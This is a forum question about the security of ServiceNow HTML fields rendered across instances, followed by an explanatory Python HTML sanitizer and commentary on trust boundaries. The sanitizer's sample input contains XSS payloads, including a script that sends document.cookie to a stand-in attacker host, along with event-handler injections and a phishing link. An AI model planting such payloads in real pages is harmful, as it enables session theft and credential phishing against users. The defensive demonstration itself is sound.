Question about HTML Fields in ServiceNow Tables & Security Considerations

ADILPASHAC
ServiceNow Employee

Hi team,

I'm trying to better understand the security considerations around using HTML-type fields in ServiceNow tables, and I'd really value your expertise on this topic.

## General Questions:

1. What are your main concerns about using HTML fields in ServiceNow tables to store HTML content for complete pages?

2. What specific problems or vulnerabilities might arise from this approach? Are there particular reasons why we should avoid using HTML-type fields in our implementation?

## My Specific Use Case:

We have two instances: MyNow and CSP. All the table APIs are in the CSP instance. When the MyNow instance calls an API, we need to send data that renders a UI Builder page.

The page render data (typically HTML) would be stored in an HTML-type field. Here are my specific questions:

- Is it recommended to use HTML-type fields in this cross-instance scenario?

- If we send HTML field responses and render them using the rich-text component, would this be recommended, since we're using it specifically in UI Builder (which the documentation states is the intended use case)?

- The rich-text component documentation mentions it should only be used in UI Builder, which matches our use case. It also states that the component "removes `<script>` tags, inline JavaScript, and other elements that might pose security exploits" through DOMPurify sanitization. Given this, would you agree that we shouldn't face security issues in this specific implementation?

I'm eager to learn more about best practices in this area and would appreciate any knowledge you can share to help me develop a more comprehensive understanding of the security considerations.

0 Replies
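The post's last question rests on what a DOMPurify-style sanitizer removes and, just as importantly, what it leaves in place. As an added example that is not part of the original post and is neither ServiceNow's rich-text component nor DOMPurify, the Python below implements the same allowlist model with the standard library's `html.parser` and runs it over a constructed page fragment of the kind the CSP instance might return: it drops `<script>` and `<iframe>` with their content, strips `on*` event handlers and the `style` attribute, and rejects `javascript:` URLs, while a well-formed link to an arbitrary external site and the text around it pass through untouched. The tag and attribute allowlists, the `attacker.example` hostname and the sample input are assumptions for illustration only; DOMPurify's default allowlists are broader than this one and it re-serialises through the browser's DOM rather than re-emitting text.

```python
"""Allowlist HTML sanitizer in the DOMPurify style, plus a demonstration of
what it strips and what it lets through.  Added example; not ServiceNow or
DOMPurify code.  The allowlists below are assumptions for illustration."""
from html import escape
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlsplit

ALLOWED_TAGS = {"div", "span", "p", "br", "h1", "h2", "h3", "b", "i", "strong",
                "em", "u", "ul", "ol", "li", "table", "tr", "td", "th", "a", "img"}
VOID_TAGS = {"br", "img"}
# Per-tag attribute allowlist; "*" applies to every allowed tag.  No "style"
# and no on* handlers on purpose.
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}, "*": {"class"}}
# Elements whose *content* is dropped too, not just the tag.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed"}
SAFE_SCHEMES = {"http", "https", "mailto"}


def safe_url(value: str) -> bool:
    """Reject javascript:, data:, vbscript: and friends in href/src."""
    # Browsers ignore control characters inside a scheme, so drop them before
    # parsing; HTMLParser has already decoded entity forms such as &colon;.
    cleaned = "".join(ch for ch in value if ord(ch) >= 0x20).strip()
    scheme = urlsplit(cleaned).scheme  # urlsplit lowercases the scheme
    return scheme == "" or scheme in SAFE_SCHEMES


class Sanitizer(HTMLParser):
    """Re-serialise only allowlisted tags/attributes; record what was dropped."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: List[str] = []
        self.dropped: List[str] = []   # audit trail of removed items
        self._open: List[str] = []     # open-tag stack, keeps output balanced
        self._skip_depth = 0           # >0 while inside a DROP_CONTENT tag

    def handle_starttag(self, tag, attrs):
        if self._skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self._skip_depth += 1
            return
        if tag in DROP_CONTENT_TAGS:
            self._skip_depth = 1
            self.dropped.append(f"<{tag}> with its content")
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"<{tag}>")   # tag goes, its text stays
            return
        allowed = ALLOWED_ATTRS.get(tag, set()) | ALLOWED_ATTRS["*"]
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on") or name not in allowed:
                self.dropped.append(f"{tag}@{name}")
            elif name in ("href", "src") and not safe_url(value):
                self.dropped.append(f"{tag}@{name}={value!r}")
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_endtag(self, tag):
        if self._skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self._skip_depth -= 1
            return
        if tag in self._open:
            # Close anything left open inside it so the output stays balanced.
            while True:
                closed = self._open.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(escape(data, quote=False))

    def close(self) -> None:
        super().close()                   # flush buffered text first
        while self._open:                 # unclosed tags in the input
            self.out.append(f"</{self._open.pop()}>")


def sanitize(html: str) -> Tuple[str, List[str]]:
    """Return (sanitized HTML, list of dropped tags/attributes)."""
    s = Sanitizer()
    s.feed(html)
    s.close()
    return "".join(s.out), s.dropped


# Constructed page fragment of the kind the other instance might return.
SAMPLE = (
    '<div class="page" style="color:red" onmouseover="steal()">'
    '<h1>Title</h1>'
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    '<p>Hello <b>world</b></p>'
    '<img src="x" onerror="alert(1)">'
    '<a href="javascript:alert(1)">bad link</a>'
    '<a href="https://attacker.example/login">Re-enter your password</a>'
    '<iframe src="https://attacker.example"></iframe>'
    '</div>'
)

if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE)
    print(clean)
    for item in dropped:
        print("dropped:", item)
```

Running it, everything that could execute script in the MyNow user's browser is gone, but the "Re-enter your password" link to `attacker.example` survives because it is ordinary, well-formed content. That is the caveat for the cross-instance design: a sanitizer in the rendering component addresses script execution, not whether whoever can write that HTML field in CSP (through the Table API or any other path) should be trusted to author what MyNow users see; that is a trust-boundary decision about the CSP instance and the accounts that can write to it, and it has to be made separately. The second practical point is that the stripping happens at render time inside the component, so the field value itself remains untrusted HTML and must not be rendered anywhere else without going through the same sanitization.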